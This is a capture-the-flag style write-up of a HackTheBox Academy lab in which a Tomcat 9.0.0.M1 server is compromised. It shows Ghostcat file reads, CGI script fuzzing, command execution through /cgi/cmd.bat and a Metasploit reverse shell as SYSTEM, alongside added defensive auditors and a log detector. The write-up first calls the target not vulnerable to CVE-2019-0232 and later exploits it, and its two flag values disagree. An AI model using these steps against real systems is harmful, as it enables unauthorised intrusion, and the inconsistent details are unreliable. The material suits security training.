Attacking Common Applications - Part I
This is part one of the Attacking Common Applications skills assessment section.
Summary (How?)
We are presented with a Windows host that has several services running. Among these, the vulnerable one is Tomcat 9.0.0.M1 running on port 8080. It does not expose any manager pages, but it is vulnerable to several CVEs, including Ghostcat and CVE-2019-0232; the latter was the key to getting into the machine, as it allowed RCE. The catch is that this RCE wasn't that straightforward: first we needed to fuzz for a vulnerable CGI script, located at /cgi/cmd.bat, and then use a Metasploit module that abuses this vulnerability to obtain a reverse shell as NT AUTHORITY\SYSTEM.
Situation
During a penetration test against the company Inlanefreight, you have performed extensive enumeration and found the network to be quite locked down and well-hardened. You come across one host of particular interest that may be your ticket to an initial foothold. Enumerate the target host for potentially vulnerable applications, obtain a foothold, and submit the contents of the flag.txt file to complete this portion of the skills assessment.
Enumeration
The nmap scan shows some open ports. We are clearly dealing with a Windows host.
└─$ nmap -p- --min-rate=1000 10.129.201.89 -oN nmap-all-ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 22:48 -03
Warning: 10.129.201.89 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.201.89
Host is up (0.17s latency).
Not shown: 65328 closed tcp ports (reset), 188 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
47001/tcp open winrm
More detail
└─$ nmap -sC -sV --min-rate=1000 10.129.201.89 -p 21,80,135,139,445,3389,5985,8000,8009,8080 -oN nmap-open-ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 22:54 -03
Nmap scan report for 10.129.201.89
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_09-01-21 08:07AM <DIR> website_backup
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Freight Logistics, Inc
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=APPS-SKILLS1
| Not valid before: 2025-06-29T01:44:37
|_Not valid after: 2025-12-29T01:44:37
| rdp-ntlm-info:
| Target_Name: APPS-SKILLS1
| NetBIOS_Domain_Name: APPS-SKILLS1
| NetBIOS_Computer_Name: APPS-SKILLS1
| DNS_Domain_Name: APPS-SKILLS1
| DNS_Computer_Name: APPS-SKILLS1
| Product_Version: 10.0.17763
|_ System_Time: 2025-06-30T01:54:58+00:00
|_ssl-date: 2025-06-30T01:55:07+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Jetty 9.4.42.v20210604
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.0.M1
|_http-server-header: Apache-Coyote/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-06-30T01:55:01
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.23 seconds
Interesting findings
- FTP with anonymous login allowed, containing a website_backup folder
- The computer name is APPS-SKILLS1
- Jetty 9.4.42.v20210604 running on port 8000
- Tomcat 9.0.0.M1 running on port 8080
- SMB does not allow a null session
└─$ smbclient -N -L //$IP/
session setup failed: NT_STATUS_ACCESS_DENIED
Contents of website_backup
From a Windows host, by browsing to ftp://10.129.201.89/website_backup/ we can easily view its contents. There's nothing interesting here.
Main page
If we visit the IP on port 80 we find this page
Here Wappalyzer identified the following technologies:
- IIS 10.0
- ASP.NET
Jenkins running on port 8000
Interesting, although it does not seem necessary for the flags
CVE-2019-0232
Apache Tomcat 9.0.0.M1 is vulnerable to CVE-2019-0232, an unauthenticated RCE vulnerability. It's explained in this GitHub repository. However, this target is not vulnerable, as the /cgi folder is not present.
Exploiting Tomcat
I already tried the following CVEs, which could easily leverage RCE:
- CVE-2017-12617
- CVE-2019-0232
- CVE-2025-24813
CNVD-2020-10487 (Ghostcat)
Here it's explained that:
Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising.
This vulnerability report identified a mechanism that allowed:
- returning arbitrary files from anywhere in the web application
- processing any file in the web application as a JSP
Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible.
The above scan confirms that ports 8080 and 8009 are open. The PoC code for the vulnerability can be found here. Download the script and save it locally. The exploit can only read files and folders within the webapps folder, which means that files like /etc/passwd can't be accessed. Let's attempt to access web.xml.
└─$ python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py $IP -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://10.129.201.89:8009/asdf
----------------------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to Tomcat
</description>
</web-app>
There isn't much here.
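The reason Ghostcat works against this host is the AJP connector on 8009: reachable from the network and accepting connections without a shared secret. As an added, defender-side example that is not part of the original write-up and not Tomcat's own tooling, here is a small Python auditor that reads a Tomcat server.xml and flags AJP connectors in that state. Both server.xml samples are constructed for this example; the attribute names (address, secret, secretRequired) are Tomcat's own, and the 9.0.31 defaults mentioned in the comments are the ones Apache changed in response to Ghostcat.

```python
import xml.etree.ElementTree as ET

# Constructed sample: a server.xml in the shape older Tomcat 9 releases shipped,
# where the AJP connector listens on every interface and needs no shared secret.
VULNERABLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>
"""

# Constructed sample: the same connector configured the way the Tomcat 9.0.31+
# defaults do it (loopback bind, secret required, secret set).
HARDENED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="EXAMPLE-SECRET-REPLACE-ME"
               redirectPort="8443" />
  </Service>
</Server>
"""

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml):
    """Return one finding per AJP connector that is exposed or unauthenticated.

    An empty list means every AJP connector is loopback-bound and secret-protected
    (or there is no AJP connector at all, which is the safest configuration).
    """
    root = ET.fromstring(server_xml)
    findings = []
    for connector in root.iter("Connector"):
        protocol = connector.get("protocol", "HTTP/1.1")
        if "AJP" not in protocol.upper():
            continue  # HTTP connectors are out of scope for Ghostcat
        issues = []
        # Before 9.0.31 an absent address meant "all interfaces"; treat absence
        # conservatively so older configs are flagged.
        address = connector.get("address", "0.0.0.0")
        if address not in LOOPBACK_ADDRESSES:
            issues.append("AJP bound to %s (reachable from the network)" % address)
        # secretRequired/secret did not exist before 9.0.31; treat absence as
        # "no secret", which is what the old connector enforced.
        secret_required = connector.get("secretRequired", "false").lower() == "true"
        if not secret_required or not connector.get("secret"):
            issues.append("no shared secret required on the AJP connector")
        if issues:
            findings.append({"port": connector.get("port", "8009"), "issues": issues})
    return findings


if __name__ == "__main__":
    for label, xml in (("vulnerable", VULNERABLE_SERVER_XML),
                       ("hardened", HARDENED_SERVER_XML)):
        print(label, "->", audit_ajp_connectors(xml) or "no AJP findings")
```

Run it against a real conf/server.xml by reading the file into a string and passing it to audit_ajp_connectors; the first sample reproduces the two findings that describe this target (network-reachable, no secret), the second returns nothing. Removing the AJP connector entirely, when nothing in front of Tomcat uses it, is the simplest fix of all.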
CVE-2019-0232
Eventually, I got back to this CVE and decided to do a broader fuzz to find a CGI script. Even though the /cgi folder returns a 404 Not Found, there may still be some scripts there. For this, I used the SecLists common.txt wordlist.
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u "http://$IP:8080/cgi/FUZZ.bat"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.201.89:8080/cgi/FUZZ.bat
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
cmd [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 210ms]
:: Progress: [4746/4746] :: Job [1/1] :: 245 req/sec :: Duration: [0:00:23] :: Errors: 0 ::
And FINALLY got a hit. Given its name, cmd.bat is probably all we need to get a foothold and retrieve the flag.
And there it is: RCE.
┌──(frang4㉿laptop-de-fran)-[~/academy-htb/attacking-common-applications/skills-assessment/part-I]
└─$ curl http://$IP:8080/cgi/cmd.bat?\&dir
Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi
09/29/2021 09:26 AM <DIR> .
09/29/2021 09:26 AM <DIR> ..
09/01/2021 07:58 AM <DIR> %SystemDrive%
09/29/2021 09:26 AM 73,802 bHPVV.exe
08/31/2021 01:55 PM 48 cmd.bat
2 File(s) 73,850 bytes
3 Dir(s) 28,372,836,352 bytes free
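What makes cmd.bat exploitable is Tomcat's CGIServlet configuration, not the script itself, so the matching defender check is a web.xml audit. As an added example (not part of the original write-up and not Tomcat's own tooling), here is a Python auditor that reports whether the CGI servlet is enabled, where it is mapped, and whether the conditions behind CVE-2019-0232 hold: enableCmdLineArguments turned on (the default until Tomcat 9.0.19 flipped it to false) and no cmdLineArgumentsDecoded allow-list (added in the same release). The three web.xml samples are constructed; the /cgi/* mapping and WEB-INF/cgi prefix mirror the directory listing above.

```python
import xml.etree.ElementTree as ET

CGI_SERVLET_CLASS = "org.apache.catalina.servlets.CGIServlet"

# Constructed sample: a web.xml that enables the CGI servlet with command-line
# arguments turned on, mapped to /cgi/* with scripts under WEB-INF/cgi (the
# layout visible in the directory listing above).
VULNERABLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>cgi</servlet-name>
    <url-pattern>/cgi/*</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Constructed sample: the same servlet with enableCmdLineArguments=false, the
# default since Tomcat 9.0.19, so the query string never reaches the script.
HARDENED_WEB_XML = VULNERABLE_WEB_XML.replace(
    "<param-value>true</param-value>", "<param-value>false</param-value>")

# Constructed sample: no CGI servlet declared at all (the safest option).
NO_CGI_WEB_XML = '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0"/>'


def _local(tag):
    """Strip the namespace: '{http://xmlns.jcp.org/xml/ns/javaee}servlet' -> 'servlet'."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    """Text of the first direct child named `name`, or None if absent."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def audit_cgi_servlet(web_xml):
    """Report whether the CGI servlet is on and which CVE-2019-0232 conditions hold."""
    root = ET.fromstring(web_xml)
    report = {"enabled": False, "mappings": [], "issues": []}
    for servlet in root:
        if _local(servlet.tag) != "servlet":
            continue
        if _child_text(servlet, "servlet-class") != CGI_SERVLET_CLASS:
            continue
        report["enabled"] = True
        name = _child_text(servlet, "servlet-name")
        params = {}
        for init in servlet:
            if _local(init.tag) == "init-param":
                params[_child_text(init, "param-name")] = _child_text(init, "param-value")
        # url-patterns are declared separately, keyed by servlet-name
        report["mappings"] += [
            _child_text(m, "url-pattern") for m in root
            if _local(m.tag) == "servlet-mapping" and _child_text(m, "servlet-name") == name
        ]
        cmdline = params.get("enableCmdLineArguments")
        if cmdline is None:
            report["issues"].append(
                "enableCmdLineArguments not set: Tomcat 9.0.18 and earlier default it to true")
        elif cmdline.lower() == "true":
            report["issues"].append(
                "enableCmdLineArguments=true: the query string is passed to the script as arguments")
            if "cmdLineArgumentsDecoded" not in params:
                report["issues"].append(
                    "no cmdLineArgumentsDecoded allow-list, so decoded arguments are not validated")
    return report


if __name__ == "__main__":
    for label, xml in (("vulnerable", VULNERABLE_WEB_XML),
                       ("hardened", HARDENED_WEB_XML),
                       ("no cgi", NO_CGI_WEB_XML)):
        print(label, "->", audit_cgi_servlet(xml))
```

Point it at both conf/web.xml (where the CGI servlet is usually declared, commented out by default) and each application's WEB-INF/web.xml, since either can enable it. The cleanest remediation is the third sample: no CGI servlet at all, with the Tomcat service additionally running as a low-privilege account rather than SYSTEM so that a future bug in any servlet does not hand over the whole host.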
After some failed attempts to upload the reverse shell payload via the URL, I decided to look in Metasploit for any modules that could help, and found this one:
msf6 > search exploit tomcat cgi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
When running it we get this error, which is weird, as we have already checked that the target is vulnerable:
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > run
[-] Handler failed to bind to 10.10.15.97:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
Let's run it anyway, as suggested in the output:
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > set ForceExploit true
ForceExploit => true
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > run
[-] Handler failed to bind to 10.10.15.97:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Command Stager progress - 6.95% done (6999/100668 bytes)
[*] Command Stager progress - 13.91% done (13998/100668 bytes)
[...]
[*] Command Stager progress - 97.34% done (97986/100668 bytes)
[*] Sending stage (177734 bytes) to 127.0.0.1
[*] Command Stager progress - 100.00% done (100668/100668 bytes)
[!] Make sure to manually cleanup the exe generated by the exploit
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54562) at 2025-06-30 16:10:50 -0300
meterpreter >
And SUCCESS
meterpreter > shell
Process 2956 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi>whoami
whoami
nt authority\system
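On the detection side, as an added example that is not part of the original write-up: every request that led to this shell goes through Tomcat's access log (AccessLogValve, default common pattern), and the CVE-2019-0232 request shape is specific enough to alert on. CGIServlet only hands the query string to the script as command-line arguments when it contains no '=', splitting on '+' and URL-decoding each token, so a request under the CGI mapping with an '='-free query is the exact precondition of the vulnerability, and a burst of 404s under that mapping from one source is the wordlist scan that preceded it. The log lines below are constructed to mirror the enumeration and the ?&dir / ?&whoami requests from this write-up; CGI_PREFIXES and ENUM_THRESHOLD are assumptions to tune per deployment.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Assumptions to tune per deployment: the url-patterns the CGI servlet is mapped
# to, and how many 404s under them from one source count as script enumeration.
CGI_PREFIXES = ("/cgi/", "/cgi-bin/")
ENUM_THRESHOLD = 5

# Constructed sample log, shaped like the traffic in this write-up: a wordlist
# scan of /cgi/, the empty probe of cmd.bat, then two argument-carrying calls.
SAMPLE_LOG = """\
10.10.15.97 - - [30/Jun/2025:15:58:02 -0300] "GET / HTTP/1.1" 200 11156
10.10.15.97 - - [30/Jun/2025:16:01:10 -0300] "GET /cgi/admin.bat HTTP/1.1" 404 -
10.10.15.97 - - [30/Jun/2025:16:01:10 -0300] "GET /cgi/backup.bat HTTP/1.1" 404 -
10.10.15.97 - - [30/Jun/2025:16:01:11 -0300] "GET /cgi/config.bat HTTP/1.1" 404 -
10.10.15.97 - - [30/Jun/2025:16:01:11 -0300] "GET /cgi/index.bat HTTP/1.1" 404 -
10.10.15.97 - - [30/Jun/2025:16:01:12 -0300] "GET /cgi/test.bat HTTP/1.1" 404 -
10.10.15.97 - - [30/Jun/2025:16:01:12 -0300] "GET /cgi/cmd.bat HTTP/1.1" 200 0
10.10.15.97 - - [30/Jun/2025:16:05:40 -0300] "GET /cgi/cmd.bat?&dir HTTP/1.1" 200 612
10.10.15.97 - - [30/Jun/2025:16:06:03 -0300] "GET /cgi/cmd.bat?&whoami HTTP/1.1" 200 26
10.129.201.50 - - [30/Jun/2025:16:07:15 -0300] "GET /docs/index.html HTTP/1.1" 200 8745
"""


def parse_access_line(line):
    """Parse one common-format line into a dict, or None if it does not match."""
    match = LOG_RE.match(line.rstrip())
    return match.groupdict() if match else None


def cgi_arguments(query):
    """Return the argument list CGIServlet would hand to the script, or [].

    With enableCmdLineArguments on, CGIServlet only treats the query string as
    arguments when it contains no '=': it splits on '+' and URL-decodes each
    token. A form-style query (a=b) is not passed on the command line.
    """
    if not query or "=" in query:
        return []
    return [unquote(token) for token in query.split("+")]


def analyze_access_log(log_text):
    """Alerts: argument-bearing CGI requests (in log order), then per-host CGI enumeration."""
    alerts = []
    cgi_404s = Counter()
    for line in log_text.splitlines():
        entry = parse_access_line(line)
        if entry is None:
            continue  # unparseable line; a real pipeline would count these
        path, _, query = entry["target"].partition("?")
        if not path.startswith(CGI_PREFIXES):
            continue
        if entry["status"] == "404":
            cgi_404s[entry["host"]] += 1
        args = cgi_arguments(query)
        if args:
            alerts.append({"rule": "cgi-arguments", "host": entry["host"],
                           "request": entry["target"], "args": args})
    for host, count in cgi_404s.items():
        if count >= ENUM_THRESHOLD:
            alerts.append({"rule": "cgi-enumeration", "host": host, "count": count})
    return alerts


if __name__ == "__main__":
    for alert in analyze_access_log(SAMPLE_LOG):
        print(alert)
```

On the sample this raises two cgi-arguments alerts (args ['&dir'] and ['&whoami'], the decoded values the script actually received) and one cgi-enumeration alert for the five 404s; the empty cmd.bat probe and the benign requests stay quiet. Because the rule keys on the servlet's own argument-parsing semantics rather than on specific command names, it also catches variants the wordlist scan never used.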
Finally, the flag
Directory of c:\Users\Administrator\Desktop
09/30/2021 10:41 AM <DIR> .
09/30/2021 10:41 AM <DIR> ..
09/29/2021 09:22 AM 32 flag.txt
1 File(s) 32 bytes
2 Dir(s) 28,372,611,072 bytes free
c:\Users\Administrator\Desktop>type flag.txt
type flag.txt
f55763ee5d3d0
Flags
- What vulnerable application is running?
Tomcat
- What port is this application running on?
8080
- What version of the application is in use?
9.0.0.M1
- Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.
f55763d31e5d3d0